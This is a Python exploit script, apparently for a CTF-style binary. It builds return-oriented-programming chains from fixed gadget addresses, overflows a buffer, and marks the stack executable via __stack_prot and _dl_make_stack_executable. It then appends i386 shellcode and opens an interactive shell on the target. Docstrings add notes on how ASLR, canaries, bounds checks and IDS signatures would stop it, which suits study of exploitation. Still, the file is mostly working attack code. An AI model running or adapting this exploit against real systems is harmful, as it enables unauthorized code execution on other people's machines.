def build_payload() -> bytes:
    """Assemble the request body sent to the target, as raw bytes.

    Layout, in order: the menu choice ``b'4\\n'``, 120 filler bytes of
    ``b'A'``, the ROP chain (one ``call`` per name in ``BINARY_FUNCTIONS``
    followed by the raw ``LAST_ROP_ADDRESS`` word), and a trailing newline.

    ``ROP``, ``BINARY_PATH``, ``BINARY_FUNCTIONS`` and ``LAST_ROP_ADDRESS``
    are module-level names not defined in this block.  The 120-byte filler
    and the chain addresses are fixed, so the result presumably only matches
    one exact build of the binary; a bounds check on the overrun buffer or a
    stack canary would stop it, and position-independent code would invalidate
    the addresses.
    """
    chain = ROP(BINARY_PATH)
    for function_name in BINARY_FUNCTIONS:
        chain.call(function_name)
    chain.raw(LAST_ROP_ADDRESS)
    parts = [b'4\n', b'A' * 120, bytes(chain), b'\n']
    return b''.join(parts)
def setRegisters(elf, registers):
    """Return a ROP chain that loads each register named in ``registers``.

    ``registers`` maps register name -> value.  The gadget selection is
    delegated to pwntools' ``ROP.setRegisters``; for every entry whose second
    element is a ``pwnlib.rop.gadgets.Gadget`` this appends the gadget address
    and then one word per register the gadget pops: the requested value when
    the register is in ``registers``, otherwise 0 as padding.  Entries whose
    second element is not a ``Gadget`` are silently skipped, so the chain may
    be incomplete for those -- verify against the pwntools version in use.
    ``pwnlib`` is a module-level name not imported in this block.
    """
    from pwn import ROP

    chain = ROP(elf)
    for entry in chain.setRegisters(registers):
        gadget = entry[1]  # entry[0] is the value pwntools chose; unused here
        if type(gadget) != pwnlib.rop.gadgets.Gadget:
            continue
        chain.raw(gadget.address)
        for reg in gadget.regs:
            chain.raw(registers.get(reg, 0))
    return chain
def main():
    """Entry point: build the ROP chain, send it to the target, hand over the session.

    Everything here depends on module-level names not defined in this block:
    ``ExploitInfo`` (``elf``, ``offset_eip``, ``shellcode_i386``), ``constants``,
    ``ROP``, ``get_process`` and ``log`` (these look like pwntools names --
    confirm).  The chain's intent is the one the author's inline comments
    describe; the ``PUSH_ESP_RET`` gadget at its end presumably transfers
    control to the bytes appended after the chain in the payload.

    Defensive reading: every gadget address below is a fixed absolute address,
    so the chain only matches one specific non-relocated build -- position-
    independent code (ASLR) invalidates all of them, and a stack canary or a
    correct bounds check on the overflowed buffer stops the return-address
    overwrite that ``offset_eip`` presumably relies on.  On the wire the
    payload is a long run of 0x41 bytes followed by raw little-endian
    addresses, a pattern that input logging on the service or a protocol-aware
    IDS can flag.
    """
    elf = ExploitInfo.elf
    addr___libc_stack_end = elf.sym['__libc_stack_end']
    addr___stack_prot = elf.sym['__stack_prot']
    # PROT_READ | PROT_WRITE | PROT_EXEC; written into __stack_prot below.
    MEM_PROT_FLAG = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC
    # Absolute gadget addresses for one specific build.  Several of these
    # (POP_EBX_RET, POP_ECX_RET, POP_ESI_RET, POP_EDI_RET, INT_80) are not used
    # by the chain as written; addr___libc_stack_end is also unused as written.
    POP_EAX_RET = 0x80b81c6
    POP_EBX_RET = 0x80481c9
    POP_ECX_RET = 0x80de955
    POP_EDX_RET = 0x806f02a
    XOR_EAX_EAX_RET = 0x8049303
    INC_EAX_RET = 0x807a86f
    MOV_DWORD_EDX_EAX_RET = 0x80549db
    POP_ESI_RET = 0x8048433
    POP_EDI_RET = 0x8048480
    INT_80 = 0x806cc25
    PUSH_ESP_RET = 0x080b81d6
    rop = ROP(elf)
    rop.raw(POP_EDX_RET)
    rop.raw(addr___stack_prot)  # edx = &__stack_prot
    rop.raw(XOR_EAX_EAX_RET)
    # eax = MEM_PROT_FLAG, reached one INC at a time -- presumably so the value
    # never appears as a literal word in the chain (see the NUL check below).
    for x in range(MEM_PROT_FLAG):
        rop.raw(INC_EAX_RET)
    rop.raw(MOV_DWORD_EDX_EAX_RET)  # __stack_prot = MEM_PROT_FLAG
    rop.raw(POP_EAX_RET)
    # rop.raw(addr___libc_stack_end)  # eax = &__libc_stack_end
    rop.call('_dl_make_stack_executable' )  # _dl_make_stack_executable(&__libc_stack_end)
    rop.raw(PUSH_ESP_RET)
    p = get_process()
    # str concatenated with rop.chain() -- Python 2 semantics; under Python 3
    # rop.chain() is bytes and this would raise.  Confirm the interpreter.
    payload = 'A' * ExploitInfo.offset_eip
    payload += rop.chain()
    payload += ExploitInfo.shellcode_i386
    # NUL-free check; note `assert` is stripped when Python runs with -O.
    assert ('\x00' not in payload)
    p.clean()  # drain whatever the target has printed so far
    log.info("Sending: %r", payload)
    p.sendline(payload)
    # Two short drains to discard output produced after the send.
    p.clean(timeout=0.5)
    p.clean(timeout=0.5)
    log.success("Here are your shell!")
    p.sendline('ls -la')
    p.interactive()
    p.close()